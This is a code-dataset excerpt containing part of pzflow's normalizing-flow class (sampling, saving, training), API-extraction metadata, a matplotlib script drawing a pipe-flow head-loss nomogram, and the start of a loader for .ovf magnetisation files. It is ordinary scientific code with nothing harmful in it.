conditions = np.zeros((nsamples, 1))
# otherwise get conditions and make `nsamples` copies of each
else:
conditions = self._get_conditions(conditions)
conditions = np.repeat(conditions, nsamples, axis=0)
# draw from latent distribution
u = self.latent.sample(self._params[0], conditions.shape[0], seed)
# take the inverse back to the data distribution
x = self._inverse(self._params[1], u, conditions=conditions)[0]
# if not conditional, or save_conditions is False, this is all we need
if self.conditional_columns is None or save_conditions is False:
x = pd.DataFrame(x, columns=self.data_columns)
# but if conditional and save_conditions is True,
# save conditions with samples
else:
# unscale the conditons
conditions = conditions * self._condition_stds + self._condition_means
x = pd.DataFrame(
np.hstack((x, conditions)),
columns=self.data_columns + self.conditional_columns,
)
# return the samples!
return x
def _save_dict(self):
"""Returns the dictionary of all flow params to be saved."""
save_dict = {"class": self.__class__.__name__}
keys = [
"data_columns",
"conditional_columns",
"condition_means",
"condition_stds",
"data_error_model",
"condition_error_model",
"autoscale_conditions",
"info",
"latent_info",
"bijector_info",
"params",
]
for key in keys:
try:
save_dict[key] = getattr(self, key)
except AttributeError:
try:
save_dict[key] = getattr(self, "_" + key)
except AttributeError:
save_dict[key] = None
return save_dict
def save(self, file: str):
"""Saves the flow to a file.
Pickles the flow and saves it to a file that can be passed as
the `file` argument during flow instantiation.
WARNING: Currently, this method only works for bijectors that are
implemented in the `bijectors` module. If you want to save a flow
with a custom bijector, you either need to add the bijector to that
module, or handle the saving and loading on your end.
Parameters
----------
file : str
Path to where the flow will be saved.
Extension `.pkl` will be appended if not already present.
"""
save_dict = self._save_dict()
with open(file, "wb") as handle:
pickle.dump(save_dict, handle, recurse=True)
def train(
self,
inputs: pd.DataFrame,
epochs: int = 50,
batch_size: int = 1024,
optimizer: Optimizer = None,
loss_fn: Callable = None,
convolve_errs: bool = False,
seed: int = 0,
verbose: bool = False,
) -> list:
"""Trains the normalizing flow on the provided inputs.
Parameters
----------
inputs : pd.DataFrame
Data on which to train the normalizing flow.
Must have columns matching self.data_columns.
epochs : int, default=50
Number of epochs to train.
batch_size : int, default=1024
Batch size for training.
optimizer : jax Optimizer, default=adam(step_size=1e-3)
An optimizer from jax.experimental.optimizers.
loss_fn : Callable, optional
A function to calculate the loss: loss = loss_fn(params, x).
If not provided, will be -mean(log_prob).
convolve_errs : bool, default=False
Whether to draw new data from the error distributions during
each epoch of training. Assumes errors are Gaussian, and method
will look for error columns in `inputs`. Error columns must end
in `_err`. E.g. the error column for the variable `u` must be
`u_err`. Zero error assumed for any missing error columns.
seed : int, default=0
A random seed to control the batching and the (optional)
error sampling.
verbose : bool, default=False
If true, print the training loss every 5% of epochs.
Returns
-------
list
List of training losses from every epoch.
"""
# validate epochs
if not isinstance(epochs, int) or epochs <= 0:
raise ValueError("epochs must be a positive integer.")
# if no loss_fn is provided, use the default loss function
if loss_fn is None:
@jit
def loss_fn(params, x, c):
return -np.mean(self._log_prob(params, x, c))
# initialize the optimizer
optimizer = adam(step_size=1e-3) if optimizer is None else optimizer
opt_init, opt_update, get_params = optimizer
opt_state = opt_init(self._params)
# define the training step function
@jit
def step(i, opt_state, x, c):
params = get_params(opt_state)
gradients = grad(loss_fn)(params, x, c)
return opt_update(i, gradients, opt_state)
# get list of data columns
columns = list(self.data_columns)
# if this is a conditional flow, and autoscale_conditions == True
# save the means and stds of the conditional columns
if self.conditional_columns is not None and self._autoscale_conditions:
self._condition_means = np.array(
inputs[list(self.conditional_columns)].values.mean(axis=0)
)
condition_stds = np.array(
inputs[list(self.conditional_columns)].values.std(axis=0)
)
self._condition_stds = np.where(condition_stds != 0, condition_stds, 1)
# define a function to return batches
if convolve_errs:
def get_batch(sample_key, x, type):
return self._get_err_samples(sample_key, x, 1, type=type)
else:
def get_batch(sample_key, x, type):
if type == "conditions":
return self._get_conditions(x)
else:
return np.array(x[columns].values)
# get random seed for training loop
key = random.PRNGKey(seed)
if verbose:
print(f"Training {epochs} epochs \nLoss:")
# save the initial loss
X = np.array(inputs[columns].values)
C = self._get_conditions(inputs)
losses = [loss_fn(self._params, X, C)]
if verbose:
print(f"(0) {losses[-1]:.4f}")
# loop through training
itercount = itertools.count()
for epoch in range(epochs):
# new permutation of batches
permute_key, sample_key, key = random.split(key, num=3)
idx = random.permutation(permute_key, inputs.shape[0])
X = inputs.iloc[idx]
# loop through batches and step optimizer
for batch_idx in range(0, len(X), batch_size):
# if sampling from the error distribution, this returns a
# Gaussian sample of the batch. Else just returns batch as a
# jax array
batch = get_batch(
sample_key, X.iloc[batch_idx : batch_idx + batch_size], type="data"
)
batch_conditions = get_batch(
sample_key,
X.iloc[batch_idx : batch_idx + batch_size],
type="conditions",
)
opt_state = step(next(itercount), opt_state, batch, batch_conditions,)
# save end-of-epoch training loss
params = get_params(opt_state)
losses.append(
loss_fn(params, np.array(X[columns].values), self._get_conditions(X),)
)
if verbose and (
epoch % max(int(0.05 * epochs), 1) == 0 or (epoch + 1) == epochs
):
print(f"({epoch+1}) {losses[-1]:.4f}")
# update the flow parameters with the final training state
self._params = get_params(opt_state)
return losses
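
# A minimal usage sketch (illustrative only). `Reverse` is one of the bijector
# examples named in the class docstring, and `df` is assumed to be a pandas
# DataFrame containing columns "x" and "y":
#
#     from pzflow.bijectors import Reverse
#     flow = Flow(data_columns=("x", "y"), bijector=Reverse())
#     losses = flow.train(df, epochs=30, verbose=True)
#     samples = flow.sample(1000, seed=0)
#     pdfs = flow.posterior(df, column="x", grid=np.linspace(-3, 3, 100))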
|
[
"jax.random.split",
"pzflow.utils.build_bijector_from_info",
"dill.load",
"jax.numpy.repeat",
"jax.random.PRNGKey",
"jax.numpy.hstack",
"jax.numpy.delete",
"jax.experimental.optimizers.adam",
"pandas.DataFrame",
"jax.numpy.nan_to_num",
"jax.numpy.where",
"dill.dump",
"numpy.isnan",
"jax.numpy.zeros",
"numpy.isclose",
"jax.ops.index_update",
"jax.numpy.exp",
"jax.numpy.trapz",
"jax.numpy.array",
"pzflow.distributions.Normal",
"numpy.random.randint",
"itertools.count",
"jax.grad",
"jax.random.permutation"
] |
[((12923, 12959), 'jax.numpy.nan_to_num', 'np.nan_to_num', (['log_prob'], {'nan': 'np.NINF'}), '(log_prob, nan=np.NINF)\n', (12936, 12959), True, 'import jax.numpy as np\n'), ((34142, 34162), 'jax.random.PRNGKey', 'random.PRNGKey', (['seed'], {}), '(seed)\n', (34156, 34162), False, 'from jax import grad, jit, ops, random\n'), ((34284, 34316), 'jax.numpy.array', 'np.array', (['inputs[columns].values'], {}), '(inputs[columns].values)\n', (34292, 34316), True, 'import jax.numpy as np\n'), ((34521, 34538), 'itertools.count', 'itertools.count', ([], {}), '()\n', (34536, 34538), False, 'import itertools\n'), ((7535, 7580), 'pzflow.utils.build_bijector_from_info', 'build_bijector_from_info', (['self._bijector_info'], {}), '(self._bijector_info)\n', (7559, 7580), False, 'from pzflow.utils import build_bijector_from_info, gaussian_error_model\n'), ((10195, 10225), 'jax.numpy.zeros', 'np.zeros', (['(inputs.shape[0], 1)'], {}), '((inputs.shape[0], 1))\n', (10203, 10225), True, 'import jax.numpy as np\n'), ((10390, 10422), 'jax.numpy.array', 'np.array', (['inputs[columns].values'], {}), '(inputs[columns].values)\n', (10398, 10422), True, 'import jax.numpy as np\n'), ((11918, 11945), 'jax.numpy.array', 'np.array', (['X[columns].values'], {}), '(X[columns].values)\n', (11926, 11945), True, 'import jax.numpy as np\n'), ((11947, 11978), 'jax.numpy.array', 'np.array', (['X[err_columns].values'], {}), '(X[err_columns].values)\n', (11955, 11978), True, 'import jax.numpy as np\n'), ((12280, 12312), 'jax.numpy.delete', 'np.delete', (['Xsamples', 'idx'], {'axis': '(1)'}), '(Xsamples, idx, axis=1)\n', (12289, 12312), True, 'import jax.numpy as np\n'), ((14313, 14345), 'jax.numpy.array', 'np.array', (['inputs[columns].values'], {}), '(inputs[columns].values)\n', (14321, 14345), True, 'import jax.numpy as np\n'), ((14894, 14914), 'jax.random.PRNGKey', 'random.PRNGKey', (['seed'], {}), '(seed)\n', (14908, 14914), False, 'from jax import grad, jit, ops, random\n'), ((19200, 19220), 'jax.random.PRNGKey', 'random.PRNGKey', (['seed'], {}), '(seed)\n', (19214, 19220), False, 'from jax import grad, jit, ops, random\n'), ((19545, 19574), 'numpy.isnan', 'onp.isnan', (["marg_rules['flag']"], {}), "(marg_rules['flag'])\n", (19554, 19574), True, 'import numpy as onp\n'), ((20433, 20550), 'jax.ops.index_update', 'ops.index_update', (['pdfs', 'ops.index[unflagged_idx, :]', 'unflagged_pdfs'], {'indices_are_sorted': '(True)', 'unique_indices': '(True)'}), '(pdfs, ops.index[unflagged_idx, :], unflagged_pdfs,\n indices_are_sorted=True, unique_indices=True)\n', (20449, 20550), False, 'from jax import grad, jit, ops, random\n'), ((26251, 26279), 'jax.numpy.nan_to_num', 'np.nan_to_num', (['pdfs'], {'nan': '(0.0)'}), '(pdfs, nan=0.0)\n', (26264, 26279), True, 'import jax.numpy as np\n'), ((27706, 27729), 'jax.numpy.zeros', 'np.zeros', (['(nsamples, 1)'], {}), '((nsamples, 1))\n', (27714, 27729), True, 'import jax.numpy as np\n'), ((27897, 27936), 'jax.numpy.repeat', 'np.repeat', (['conditions', 'nsamples'], {'axis': '(0)'}), '(conditions, nsamples, axis=0)\n', (27906, 27936), True, 'import jax.numpy as np\n'), ((28350, 28392), 'pandas.DataFrame', 'pd.DataFrame', (['x'], {'columns': 'self.data_columns'}), '(x, columns=self.data_columns)\n', (28362, 28392), True, 'import pandas as pd\n'), ((30417, 30461), 'dill.dump', 'pickle.dump', (['save_dict', 'handle'], {'recurse': '(True)'}), '(save_dict, handle, recurse=True)\n', (30428, 30461), True, 'import dill as pickle\n'), ((32615, 32636), 'jax.experimental.optimizers.adam', 'adam', ([], 
{'step_size': '(0.001)'}), '(step_size=0.001)\n', (32619, 32636), False, 'from jax.experimental.optimizers import Optimizer, adam\n'), ((33605, 33653), 'jax.numpy.where', 'np.where', (['(condition_stds != 0)', 'condition_stds', '(1)'], {}), '(condition_stds != 0, condition_stds, 1)\n', (33613, 33653), True, 'import jax.numpy as np\n'), ((34659, 34683), 'jax.random.split', 'random.split', (['key'], {'num': '(3)'}), '(key, num=3)\n', (34671, 34683), False, 'from jax import grad, jit, ops, random\n'), ((34702, 34750), 'jax.random.permutation', 'random.permutation', (['permute_key', 'inputs.shape[0]'], {}), '(permute_key, inputs.shape[0])\n', (34720, 34750), False, 'from jax import grad, jit, ops, random\n'), ((7653, 7670), 'jax.random.PRNGKey', 'random.PRNGKey', (['(0)'], {}), '(0)\n', (7667, 7670), False, 'from jax import grad, jit, ops, random\n'), ((9059, 9096), 'pzflow.distributions.Normal', 'distributions.Normal', (['self._input_dim'], {}), '(self._input_dim)\n', (9079, 9096), False, 'from pzflow import distributions\n'), ((9807, 9827), 'jax.random.PRNGKey', 'random.PRNGKey', (['seed'], {}), '(seed)\n', (9821, 9827), False, 'from jax import grad, jit, ops, random\n'), ((11577, 11597), 'jax.numpy.zeros', 'np.zeros', (['X.shape[0]'], {}), '(X.shape[0])\n', (11585, 11597), True, 'import jax.numpy as np\n'), ((14825, 14850), 'numpy.random.randint', 'onp.random.randint', (['(1e+18)'], {}), '(1e+18)\n', (14843, 14850), True, 'import numpy as onp\n'), ((19131, 19156), 'numpy.random.randint', 'onp.random.randint', (['(1e+18)'], {}), '(1e+18)\n', (19149, 19156), True, 'import numpy as onp\n'), ((23037, 23147), 'jax.ops.index_update', 'ops.index_update', (['pdfs', 'ops.index[flagged_idx, :]', 'marg_pdfs'], {'indices_are_sorted': '(True)', 'unique_indices': '(True)'}), '(pdfs, ops.index[flagged_idx, :], marg_pdfs,\n indices_are_sorted=True, unique_indices=True)\n', (23053, 23147), False, 'from jax import grad, jit, ops, random\n'), ((25456, 25472), 'jax.numpy.exp', 'np.exp', (['log_prob'], {}), '(log_prob)\n', (25462, 25472), True, 'import jax.numpy as np\n'), ((25776, 25902), 'jax.ops.index_update', 'ops.index_update', (['pdfs', 'ops.index[batch_idx:batch_idx + batch_size, :]', 'prob'], {'indices_are_sorted': '(True)', 'unique_indices': '(True)'}), '(pdfs, ops.index[batch_idx:batch_idx + batch_size, :], prob,\n indices_are_sorted=True, unique_indices=True)\n', (25792, 25902), False, 'from jax import grad, jit, ops, random\n'), ((28669, 28695), 'jax.numpy.hstack', 'np.hstack', (['(x, conditions)'], {}), '((x, conditions))\n', (28678, 28695), True, 'import jax.numpy as np\n'), ((32931, 32944), 'jax.grad', 'grad', (['loss_fn'], {}), '(loss_fn)\n', (32935, 32944), False, 'from jax import grad, jit, ops, random\n'), ((11063, 11102), 'jax.numpy.zeros', 'np.zeros', (['(err_samples * X.shape[0], 1)'], {}), '((err_samples * X.shape[0], 1))\n', (11071, 11102), True, 'import jax.numpy as np\n'), ((19643, 19658), 'numpy.isnan', 'onp.isnan', (['data'], {}), '(data)\n', (19652, 19658), True, 'import numpy as onp\n'), ((19801, 19838), 'numpy.isclose', 'onp.isclose', (['data', "marg_rules['flag']"], {}), "(data, marg_rules['flag'])\n", (19812, 19838), True, 'import numpy as onp\n'), ((21852, 21923), 'jax.numpy.repeat', 'np.repeat', (['inputs.iloc[flagged_idx].values', 'marg_grids.shape[1]'], {'axis': '(0)'}), '(inputs.iloc[flagged_idx].values, marg_grids.shape[1], axis=0)\n', (21861, 21923), True, 'import jax.numpy as np\n'), ((23944, 23975), 'jax.numpy.array', 'np.array', (['batch[columns].values'], {}), 
'(batch[columns].values)\n', (23952, 23975), True, 'import jax.numpy as np\n'), ((34055, 34082), 'jax.numpy.array', 'np.array', (['x[columns].values'], {}), '(x[columns].values)\n', (34063, 34082), True, 'import jax.numpy as np\n'), ((35655, 35682), 'jax.numpy.array', 'np.array', (['X[columns].values'], {}), '(X[columns].values)\n', (35663, 35682), True, 'import jax.numpy as np\n'), ((6417, 6436), 'dill.load', 'pickle.load', (['handle'], {}), '(handle)\n', (6428, 6436), True, 'import dill as pickle\n'), ((11722, 11742), 'jax.numpy.zeros', 'np.zeros', (['X.shape[0]'], {}), '(X.shape[0])\n', (11730, 11742), True, 'import jax.numpy as np\n'), ((11786, 11806), 'jax.numpy.zeros', 'np.zeros', (['X.shape[0]'], {}), '(X.shape[0])\n', (11794, 11806), True, 'import jax.numpy as np\n'), ((24254, 24307), 'jax.numpy.repeat', 'np.repeat', (['batch[columns].values', 'err_samples'], {'axis': '(0)'}), '(batch[columns].values, err_samples, axis=0)\n', (24263, 24307), True, 'import jax.numpy as np\n'), ((26118, 26142), 'jax.numpy.trapz', 'np.trapz', ([], {'y': 'pdfs', 'x': 'grid'}), '(y=pdfs, x=grid)\n', (26126, 26142), True, 'import jax.numpy as np\n')]
|
from math import pi
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from scipy.optimize import minimize_scalar
__author__ = "<NAME>"
__credits__ = ["<NAME>"]
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__version__ = "0.1"
__license__ = "MIT"
# gravitational acceleration
g = 9.81 # m/s²
# kinematic viscosity
ny = 1.3e-6 # m^2/s (10°C water)
# _________________________________________________________________________________________________________________
def log_scale(start, end, minor=False, lower=None, upper=None):
"""
get the log scale ticks for the diagram
    Args:
        start (int): exponent of the first decade (ticks start at 10**start)
        end (int): exponent of the last decade (exclusive, as in range(start, end))
        minor (bool): return the denser minor-tick spacing instead of the major ticks
        lower (int | float): drop ticks below this value
        upper (int | float): drop ticks above this value
Returns:
numpy.array: ticks of the scale
"""
if minor:
std = np.array([1., 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.,
2.2, 2.4, 2.6, 2.8, 3., 3.2, 3.4, 3.6, 3.8, 4., 4.2,
4.4, 4.6, 4.8, 5., 5.5, 6., 6.5, 7., 7.5, 8., 8.5,
9., 9.5, 10.])
else:
std = np.array([1., 1.5, 2., 3., 4., 5., 6., 8., 10.])
res = np.array([])
for x in range(start, end):
res = np.append(res, std * 10. ** x)
res = np.unique(res.round(3))
if lower is not None:
res = res[res >= lower]
if upper is not None:
res = res[res <= upper]
return res
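# Illustrative note (added): with the default major spacing, log_scale(0, 1)
# returns the ticks of a single decade, i.e. 1, 1.5, 2, 3, 4, 5, 6, 8 and 10,
# while log_scale(-1, 3) spans 0.1 ... 1000 with the same per-decade pattern.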
def nomogram(k=0.1):
"""
make the nomogram
Args:
        k (float): pipe roughness in mm
Returns:
        matplotlib.pyplot.Figure: the assembled nomogram figure
"""
# diameter
d = np.array(
[0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.1, 0.125, 0.15, 0.2, 0.25, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0,
1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.0]) # m
# velocity
v = np.array(
[0.1, 0.15, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.2, 1.4, 1.6, 1.8, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0,
6.0, 7.0, 8.0, 9.0, 10.0, 12.0, 14.0, 16.0, 18.0, 20.0]) # m/s
# head loss
J = log_scale(-1, 3, minor=True) # mm/m
J_labels = log_scale(-1, 3, minor=False)
# flow
Q = log_scale(-1, 5, minor=True, upper=20000) # L/s
Q_labels = log_scale(-1, 5, minor=False, upper=20000)
# _________________________________________________________________________________________________________________
def area(d):
return d ** 2 * pi / 4
# _________________________________________________________________________________________________________________
def velocity(J, d):
return -2 * np.log10(2.51 * ny / (d * np.sqrt(2 * g * (J / 1000) * d)) +
(k / 1000) / (3.71 * d)) * \
np.sqrt(2 * g * d * (J / 1000))
# _________________________________________________________________________________________________________________
def get_diameter(v, J):
res = minimize_scalar(lambda x: abs(velocity(J, x) - v), bounds=(min(d), max(d)), method='bounded').x
if (round(res, 5) >= max(d)) or (round(res, 5) <= min(d)):
return np.NaN
return res
# _________________________________________________________________________________________________________________
fig, ax = plt.subplots()
def bbox(pad):
return {'facecolor': 'white', 'alpha': 0.8, 'pad': pad, 'linewidth': 0}
# _________________________________________________________________________________________________________________
# diameter lines
df_d = pd.DataFrame(index=J, columns=d)
first = True
for d_ in df_d:
vi = velocity(df_d.index.values, d_)
df_d[d_] = area(d_) * vi * 1000
# change_d = 0.6
# low, up = [0.34, 5.4]
change_d = np.NaN
low, up = [2.2, 2.2]
if d_ == change_d:
tvs = [low, up]
elif d_ < change_d:
tvs = [low]
else:
tvs = [up]
for tv in tvs:
tx = np.interp(tv, vi, J)
ty = area(d_) * tv * 1000
if first or d_ in (change_d, max(d)):
txt = 'd={}m'.format(d_)
if first:
first = False
else:
txt = d_
ax.text(tx, ty, txt, fontsize=5, rotation=30, horizontalalignment='center', verticalalignment='bottom',
bbox=bbox(1))
ax = df_d.plot(c='black', legend=False, logy=True, logx=True, ax=ax, lw=0.5)
# _________________________________________________________________________________________________________________
# velocity lines
print('0')
df_v = pd.DataFrame(index=np.logspace(-1, 3, num=500), columns=v)
# df_v = pd.DataFrame(index=J, columns=v)
first = True
for v_ in df_v:
d_ = df_v.index.to_series().apply(lambda Ji: get_diameter(v_, Ji)).values
# d_ = np.array([get_d(v_, Ji) for Ji in df_v.index.values])
Ai = area(d_)
df_v[v_] = Ai * v_ * 1000
# change_v = 5.
# low, up = [0.043, 0.43]
change_v = 9.
low, up = [0.11, 0.43]
if v_ == change_v:
tds = [low, up]
elif v_ < change_v:
tds = [low]
else:
tds = [up]
for td in tds:
data = pd.DataFrame()
data['d'] = d_
data['J'] = df_v.index.values
data.dropna(inplace=True)
data.sort_values('d', inplace=True)
tx = np.interp(td, data['d'].values, data['J'].values)
ty = area(td) * v_ * 1000
if first or (v_ in (change_v, max(v))):
txt = 'v={}m/s'.format(v_).replace('.0', '')
if first:
first = False
else:
txt = v_
if pd.notna(tx) and pd.notna(ty):
ax.text(tx, ty, txt, fontsize=5, rotation=-60, horizontalalignment='center', verticalalignment='bottom',
bbox=bbox(1))
print('1')
ax = df_v.plot(c='black', legend=False, logy=True, logx=True, ax=ax, lw=0.5)
# _________________________________________________________________________________________________________________
ax.set_xticks(J, minor=True)
ax.set_yticks(Q, minor=True)
ax.set_xticks(J_labels, minor=False)
ax.set_yticks(Q_labels, minor=False)
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.set_xticklabels([], minor=True)
ax.set_yticklabels([], minor=True)
ax.set_xticklabels([str(x).replace('.00', '').replace('.0', '') for x in J_labels], fontsize=6,
fontstretch='ultra-condensed')
ax.set_yticklabels([str(x).replace('.00', '').replace('.0', '') for x in Q_labels], fontsize=6)
ax.grid(linestyle=':', lw=0.2, c='grey', which='minor')
ax.grid(linestyle='-', lw=0.4, c='darkgrey')
ax.set_xlabel('Druckhöhengefälle J (mm/m)')
ax.set_ylabel('Durchfluss Q (l/s)')
ax.set_ylim([min(Q), max(Q)])
ax.set_xlim([min(J), max(J)])
ax.tick_params(direction='out', bottom=True, top=True, left=True, right=True, labelbottom=True, labeltop=True,
labelleft=True, labelright=True, which='both')
ax.text(0.15, 11000, 'k = {:0.01f} mm'.format(k), fontsize=22, fontstretch='ultra-condensed', bbox=bbox(5))
ax.text(340, 1.7, 'v (m/s)', fontsize=12, rotation=-60, bbox=bbox(2))
ax.text(300, 0.6, 'd (m)', fontsize=12, rotation=30, bbox=bbox(2))
# _________________________________________________________________________________________________________________
# figure post processing
fig.set_size_inches(h=29.7 / 2.54, w=21 / 2.54)
fig.tight_layout()
return fig
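# Added illustration (not part of the original nomogram): the Prandtl-Colebrook
# relation used inside nomogram(), evaluated for a single operating point. The
# helper name flow_rate_point is ours; it only reuses the module constants g
# and ny defined above.
def flow_rate_point(d, J, k=0.1):
    """flow rate in L/s for diameter d (m), head loss J (mm/m) and roughness k (mm)"""
    v = -2 * np.log10(2.51 * ny / (d * np.sqrt(2 * g * (J / 1000) * d)) +
                     (k / 1000) / (3.71 * d)) * np.sqrt(2 * g * d * (J / 1000))
    return d ** 2 * pi / 4 * v * 1000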
if __name__ == '__main__':
fig = nomogram()
k = 0.1 # mm
fig.savefig('Nomogramm k_{:0.1f}mm'.format(k).replace('.', '') + '.pdf')
plt.close(fig)
|
[
"numpy.sqrt",
"numpy.append",
"numpy.array",
"matplotlib.pyplot.close",
"numpy.interp",
"pandas.DataFrame",
"numpy.logspace",
"matplotlib.pyplot.subplots",
"pandas.notna"
] |
[((1168, 1180), 'numpy.array', 'np.array', (['[]'], {}), '([])\n', (1176, 1180), True, 'import numpy as np\n'), ((1620, 1801), 'numpy.array', 'np.array', (['[0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.1, 0.125, 0.15, 0.2, 0.25, 0.3,\n 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, \n 1.8, 1.9, 2.0]'], {}), '([0.02, 0.03, 0.04, 0.05, 0.06, 0.07, 0.08, 0.1, 0.125, 0.15, 0.2, \n 0.25, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5, \n 1.6, 1.7, 1.8, 1.9, 2.0])\n', (1628, 1801), True, 'import numpy as np\n'), ((1839, 2025), 'numpy.array', 'np.array', (['[0.1, 0.15, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.2, 1.4, 1.6, 1.8,\n 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, 12.0, 14.0,\n 16.0, 18.0, 20.0]'], {}), '([0.1, 0.15, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0, 1.2, 1.4,\n 1.6, 1.8, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0, 6.0, 7.0, 8.0, 9.0, 10.0, \n 12.0, 14.0, 16.0, 18.0, 20.0])\n', (1847, 2025), True, 'import numpy as np\n'), ((3282, 3296), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (3294, 3296), True, 'import matplotlib.pyplot as plt\n'), ((3550, 3582), 'pandas.DataFrame', 'pd.DataFrame', ([], {'index': 'J', 'columns': 'd'}), '(index=J, columns=d)\n', (3562, 3582), True, 'import pandas as pd\n'), ((7862, 7876), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (7871, 7876), True, 'import matplotlib.pyplot as plt\n'), ((830, 1031), 'numpy.array', 'np.array', (['[1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.0, 2.2, 2.4, 2.6, 2.8,\n 3.0, 3.2, 3.4, 3.6, 3.8, 4.0, 4.2, 4.4, 4.6, 4.8, 5.0, 5.5, 6.0, 6.5, \n 7.0, 7.5, 8.0, 8.5, 9.0, 9.5, 10.0]'], {}), '([1.0, 1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 2.0, 2.2, 2.4, \n 2.6, 2.8, 3.0, 3.2, 3.4, 3.6, 3.8, 4.0, 4.2, 4.4, 4.6, 4.8, 5.0, 5.5, \n 6.0, 6.5, 7.0, 7.5, 8.0, 8.5, 9.0, 9.5, 10.0])\n', (838, 1031), True, 'import numpy as np\n'), ((1108, 1164), 'numpy.array', 'np.array', (['[1.0, 1.5, 2.0, 3.0, 4.0, 5.0, 6.0, 8.0, 10.0]'], {}), '([1.0, 1.5, 2.0, 3.0, 4.0, 5.0, 6.0, 8.0, 10.0])\n', (1116, 1164), True, 'import numpy as np\n'), ((1227, 1258), 'numpy.append', 'np.append', (['res', '(std * 10.0 ** x)'], {}), '(res, std * 10.0 ** x)\n', (1236, 1258), True, 'import numpy as np\n'), ((2744, 2775), 'numpy.sqrt', 'np.sqrt', (['(2 * g * d * (J / 1000))'], {}), '(2 * g * d * (J / 1000))\n', (2751, 2775), True, 'import numpy as np\n'), ((4004, 4024), 'numpy.interp', 'np.interp', (['tv', 'vi', 'J'], {}), '(tv, vi, J)\n', (4013, 4024), True, 'import numpy as np\n'), ((4678, 4705), 'numpy.logspace', 'np.logspace', (['(-1)', '(3)'], {'num': '(500)'}), '(-1, 3, num=500)\n', (4689, 4705), True, 'import numpy as np\n'), ((5310, 5324), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (5322, 5324), True, 'import pandas as pd\n'), ((5498, 5547), 'numpy.interp', 'np.interp', (['td', "data['d'].values", "data['J'].values"], {}), "(td, data['d'].values, data['J'].values)\n", (5507, 5547), True, 'import numpy as np\n'), ((5819, 5831), 'pandas.notna', 'pd.notna', (['tx'], {}), '(tx)\n', (5827, 5831), True, 'import pandas as pd\n'), ((5836, 5848), 'pandas.notna', 'pd.notna', (['ty'], {}), '(ty)\n', (5844, 5848), True, 'import pandas as pd\n'), ((2636, 2667), 'numpy.sqrt', 'np.sqrt', (['(2 * g * (J / 1000) * d)'], {}), '(2 * g * (J / 1000) * d)\n', (2643, 2667), True, 'import numpy as np\n')]
|
from __future__ import division, print_function
import os
import os.path as fs
import numpy as np
import pandas as pd
import re
### PURPOSE: Takes a directory containing N files of the form mXXXXXX.ovf ###
### and imports them to an N x X x Y x Z x 3 numpy array ###
### where X,Y,Z are the number of cells in x,y,z ###
### Files will have the naming convention m*.ovf where * is 6 digit decimal number ###
### eg. 000000, 000001, 000123, etc ###
### So use regex to find something of the form m/<number>*/.ovf ###
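# Example (added for clarity): the regex used in import_dir() accepts names such
# as 'm000000.ovf' or 'm000123.ovf' and rejects unrelated files:
#     re.match(r'm\d*\.ovf', 'm000123.ovf')  -> match object
#     re.match(r'm\d*\.ovf', 'table.txt')    -> None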
def import_dir(path='.', which_files='all', skyrmion=False, core_slice='h', average=True):
#default path is this folder
#which files gives a range of files (default to all in dir)
ls = sorted(os.listdir(path)) #list and sort all files in given path
magnetisation_files=[] #init list of filenames in this dir
for el in ls: #test the regex for magnetisation file format, if found add to filename list
        if re.match(r'm\d*\.ovf', el) is not None:
magnetisation_files.append(el)
file_name=fs.join(path, str(magnetisation_files[0])) #creates the filename for the first mag field
data_dimensions=getOvfAttributes(file_name) #gets the file attributes x,y,z nodes (eg 2x2x128)
num_files_to_import=len(magnetisation_files)
if which_files!='all':
print("not importing all files, importing files ",which_files[0], " to ", which_files[1])
num_files_to_import=which_files[1]-which_files[0]
all_mag_data=np.empty((num_files_to_import, data_dimensions[2]), dtype=(float, 3) )
i=0
first_time=True
percentages=[]
for n, fname in enumerate(magnetisation_files):
if which_files!='all':
if n<which_files[0]:
continue
if n>=which_files[1]:
break
if first_time:
print("starting to read ",num_files_to_import," files")
first_time=False
this_filename=fs.join(path, fname)
all_mag_data[i]=importOvfFilePandas(this_filename, data_dimensions, core_slice=core_slice, skyrmion=skyrmion, average_to_1D=average)
if i/num_files_to_import*100%10<0.2:
if np.floor(i*100/num_files_to_import) not in percentages:
print(np.floor(i*100.0/num_files_to_import),"% done")
percentages.append(np.floor(i*100/num_files_to_import))
i+=1
#print data_array.shape
print("100% done!")
print("read ",i," files")
return all_mag_data
def getOvfAttributes(filename):
if filename[-4:]!='.ovf': #if filetype is not ovf, exit with error code 1
print("FATAL ERROR, NOT AN OVF FILE")
return -1
f=open(filename, 'r')
j=0
for line in f:
if re.match('.*Binary.*', line) is not None: #if the data type is a binary, just exit with error code -2
print("FATAL ERROR: BINARY NOT SUPPORTED")
return -2
if j==20:
x_nodes=int(line[10:])
if j==21:
y_nodes=int(line[10:])
if j==22:
z_nodes=int(line[10:])
break
#print (str(j)+'\t'+str(line))
j+=1
f.close()
return(x_nodes, y_nodes, z_nodes)
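# Note added for clarity (header layout is an assumption about the MuMax3/OVF
# text format): the parser above expects the x/y/z node counts on fixed header
# lines, presumably of the form
#     # xnodes: 128
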